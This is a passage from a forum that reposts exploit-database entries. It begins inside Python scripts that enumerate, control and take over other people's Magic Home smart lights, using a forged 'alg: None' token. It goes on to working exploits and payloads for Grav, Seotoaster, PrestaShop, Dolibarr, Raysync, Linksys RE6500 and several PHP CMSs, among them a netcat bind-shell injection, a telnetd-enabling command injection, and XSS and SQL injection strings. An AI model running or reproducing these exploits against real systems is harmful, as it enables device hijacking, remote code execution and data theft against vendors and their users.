headers=headersOn) if response.status_code == 200: if "true" in response.text: print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On") else: print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") def turnOff(target, token): urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71240fa4","macAddress":target} ] } data = json.dumps(array) headersOff = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "token":token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } print (Fore.WHITE + "[+] Sending Payload ...") response = requests.post(urlOff, data=data, headers=headersOff) if response.status_code == 200: if "true" in response.text: print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off") else: print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") def lighItUp(target, token): outtahere = "" q = "q" if len(str(target)) < 12: print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): while outtahere.lower() != q.lower(): if outtahere == "0": turnOn(target, token) elif outtahere == "1": turnOff(target, token) outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) def Main(): urlAuth = "https://wifij01us.magichue.net/app/login/ZG001" data = { "userID":"<Valid Registered Email/Username>", "password":"<Valid Registered Password>", "clientID":"" } headersAuth = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } # First Stage Authenticate os.system('clear') print (Fore.WHITE + "[+] Authenticating ...") response = requests.post(urlAuth, json=data, headers=headersAuth) resJsonAuth = response.json() token = (resJsonAuth['token']) # Second Stage Enumerate print (Fore.WHITE + "[+] Enumerating ...") macbase = "C82E475DCE" macaddress = [] a = ["%02d" % x for x in range(100)] for num in a: macaddress.append(macbase+num) with open('loot.txt', 'w') as f: for mac in macaddress: urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001" params = { "macAddress":mac } headersEnum = { "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Content-Type": "application/json; charset=utf-8", "Accept": "application/json", "token": token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } response = requests.get(urlEnum, params=params, headers=headersEnum) resJsonEnum = response.json() data = (resJsonEnum['data']) if not data: pass elif data: found_macaddresses.append(mac) print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}") f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n") else: print (Fore.RED + "[-] No results found!") print(Style.RESET_ALL) if not found_macaddresses: print (Fore.RED + "[-] No MAC addresses retrieved") elif found_macaddresses: attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL) if (attackboolean.upper() == 'Y'): target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL) lighItUp(target, token) elif (attackboolean.upper() == 'N'): print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL) else: print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL) if __name__ == "__main__": Main() ## Token Forging ## #!/usr/local/bin/python3 import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re import time from wsgiref.handlers import format_date_time from datetime import datetime from time import mktime now = datetime.now() stamp = mktime(now.timetuple()) ''' HTTP/1.1 200 Server: nginx/1.10.3 Content-Type: application/json;charset=UTF-8 Connection: close "{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}" ''' def Usage(): print (f"Usage: {sys.argv[0]} <username> <unique id>") def Main(user, uniqid): os.system('clear') print ("[+] Encoding ...") print ("[+] Bypass header created!") print ("HTTP/1.1 200") print ("Server: nginx/1.10.3") print ("Date: "+str(format_date_time(stamp))+"") print ("Content-Type: application/json;charset=UTF-8") print ("Connection: close\r\n\r\n") jwt_header = '{"typ": "JsonWebToken","alg": "None"}' jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}' jwt_headerEncoded = url64.encode(jwt_header.strip()) jwt_dataEncoded = url64.encode(jwt_data.strip()) jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".") print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}") if __name__ == "__main__": if len(sys.argv) < 3: Usage() else: Main(sys.argv[1], sys.argv[2]) ## Device Takeover PoC ## #!/usr/local/bin/python3 import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re def Usage(): print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>") def Main(): attacker_email = sys.argv[1] target_email = sys.argv[2] target_mac = sys.argv[3] forged_token = sys.argv[4] os.system('clear') print (Fore.WHITE + "[+] Sending Payload ...") url = "https://wifij01us.magichue.net/app/shareDevice/ZG001" array = {"friendUserID":attacker_email, "macAddress":target_mac} data = json.dumps(array) headers = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "token":forged_token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } response = requests.post(url, data=data, headers=headers) if response.status_code == 200: if "true" in response.text: print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL) else: print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL) if __name__ == "__main__": if len(sys.argv) < 5: Usage() else: Main()
  16. ISHACK AI BOT

    Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting # Date: 13-12-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://getgrav.org/ # Software Link: https://getgrav.org/downloads # Version: Grav v1.6.30 - Admin v1.9.18 # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/sagarbanwa/ Step to reproduce : 1) log in to the grav-admin panel 2) Go to Pages 3) Click on Add 4) It will ask to Add Page 5) fill the following details as below Page Title : <script>alert(1337)</script> Folder Name : sagar_Banwa Parent Page : /(root) Page Template : Default Value : yes 6) click on the Save button 7) now Click on Pages again. 8) your page name will be listed as <script>alert(1337)</script> 9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up ------------------------------------- POST /grav-admin/admin/pages HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 230 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/grav-admin/admin/pages Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22} Upgrade-Insecure-Requests: 1 data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f -----------------------------
  17. ISHACK AI BOT

    Raysync 3.3.3.8 - RCE

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Raysync 3.3.3.8 - RCE # Date: 04/10/2020 # Exploit Author: XiaoLong Zhu # Vendor Homepage: www.raysync.io # Version: below 3.3.3.8 # Tested on: Linux step1: run RaysyncServer.sh to build a web application on the local environment, set admin password to 123456 , which will be write to manage.db file. step2: curl "[email protected]" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db to override remote manage.db file in server. step3: login in admin portal with admin/123456. step4: create a normal file with all permissions in scope. step5: modify RaySyncServer.sh ,add arbitrary evil command. step6: trigger rce with clicking "reset" button
  18. ISHACK AI BOT

    PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection # Date: 2020-12-15 # Exploit Author: Frederic ADAM # Author contact: [email protected] # Vendor Homepage: https://www.prestashop.com # Software Link: https://github.com/PrestaShop/productcomments # Version: 4.2.0 # Tested on: Debian 10 # CVE : CVE-2020-26248 http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL] Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
  19. ISHACK AI BOT

    Seotoaster 3.2.0 - Stored XSS on Edit page properties

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties # Exploit Author: Hardik Solanki # Vendor Homepage: https://www.seotoaster.com/ # Software Link: https://crm-marketing-automation-platforms.seotoaster.com/ # Version: 3.2.0 # Tested on Windows 10 XSS ATTACK: Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments. XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Edit page properties Steps to reproduce: 1: Navigate to "https://localhost/" and log in with valid credentials. 2: Then navigates/click on "Edit page properties". 3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully. 4: Hence XSS will get stored and trigger on the main home/main page.
  20. ISHACK AI BOT

    Linksys RE6500 1.0.11.001 - Unauthenticated RCE

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE # Date: 31/07/2020 # Exploit Author: RE-Solver # Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4 # Vendor Homepage: www.linksys.com # Version: FW V1.05 up to FW v1.0.11.001 # Tested on: FW V1.05 up to FW v1.0.11.001 # Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE # Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. # An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. #!/usr/bin/env python from requests import Session import requests import os print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.") print("Tested on FW V1.05 up to FW v1.0.11.001") print("RE-Solver @solver_re") ip="192.168.1.226" command="nvram_get Password >/tmp/lastpwd" #save device password; post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r= s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Prev password saved in /tmp/lastpwd") command="busybox telnetd" #start telnetd; post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r=s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Telnet Enabled") #set admin password post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r=s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Prevent corrupting nvram - set a new password= admin")
  21. ISHACK AI BOT

    Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated) # Date: 2020.12.17 # Exploit Author: Yilmaz Degirmenci # Vendor Homepage: https://github.com/Dolibarr/dolibarr # Software Link: https://sourceforge.net/projects/dolibarr/ # Version: 12.0.3 # Tested on: Kali Linux 2020.2 # Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is # vulnerable to authenticated Remote Code Execution Attack. An attacker who # has the access the admin dashboard can manipulate the backup function by # inserting payload into the zipfilename_template parameter at page # /admin/tools/dolibarr_export.php by clicking on the button "Generate # Backup" thus triggering command injection on target system. import requests from bs4 import BeautifulSoup from bs4 import Comment import re import lxml import json import urllib username = input("username: ") password = input("password: ") root_url = input("Root URL: http://192.168.0.15/ --> ") print("Exploit is sent! Check out if the bind shell on port 9999 active!") listener_port = "9999" login_url = root_url + "/index.php?mainmenu=home " vulnerable_url = root_url + "/admin/tools/dolibarr_export.php" upload_url = root_url + "/admin/tools/export_files.php" session = requests.Session() request = session.get(login_url) # Get the token value soup = BeautifulSoup(request.text,"lxml") token = soup.find("input",{'name':'token'})['value'] # Login body = {"token":token, "actionlogin":"login", "loginfunction":"loginfunction", "tz":"-5", "tz_string":"America%2FNew_York", "dst_observed":"1", "dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second": "2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664", "dol_hide_topmenu":"", "dol_hide_leftmenu":"", "dol_optimize_smallscreen":"", "dol_no_mouse_hover":"", "dol_use_jmobile":"", "username":username,"password":password} session.post(login_url, data=body, cookies=request.cookies) request = session.get(vulnerable_url) token = soup.find("input",{'name':'token'})['value'] header = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0", "Accept":"*/", "Accept-Encoding": "gzip, deflate", "Origin": root_url, "Referer": root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools", "Upgrade-Insecure-Requests": "1" } body = {"token":token, "export_type":"server", "page_y":"1039", "zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar --use-compress-program='nc -c bash -nlvp 9999' %0a :: ", "compression":"gz"} param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote) session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
  22. ISHACK AI BOT

    Content Management System 1.0 - 'First Name' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Tested on: WINDOWS 10 Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name to "<script>alert(document.domain)</script>". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.
  23. ISHACK AI BOT

    Content Management System 1.0 - 'email' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Content Management System 1.0 - 'email' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=login HTTP/1.1 Host: 10.211.55.4 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 61 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://10.211.55.4 Referer: http://10.211.55.4/login.php X-Requested-With: XMLHttpRequest Accept-Encoding: gzip email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123 --- SQLMAP --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: [email protected]'and'p'='p' AND 9108=9108 AND 'WlxU'='WlxU&password=admin123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]'and'p'='p' AND (SELECT 3864 FROM (SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123 ---
  24. ISHACK AI BOT

    Content Management System 1.0 - 'id' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Content Management System 1.0 - 'id' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the " http://127.0.0.1/ajax.php?action=load_list" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=load_list HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 63 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://127.0.0.1 Referer: http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0 --- SQLMAP --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 AND 'ZPQO'='ZPQO&start=0 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0 Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- -&start=0 ---
  25. ISHACK AI BOT

    Medical Center Portal Management System 1.0 - 'id' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-10 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with any verified user credentials Step 2. Select Staff and select the view icon. Step 3. You will be redirected to a page like " http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE (SELECT 4035 UNION SELECT 6415) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT COUNT(*),CONCAT(0x716b6a7871,(SELECT (ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=edit & id=22 AND (SELECT 4861 FROM (SELECT(SLEEP(5)))xiXm) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: action=edit & id=22 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL-- - ---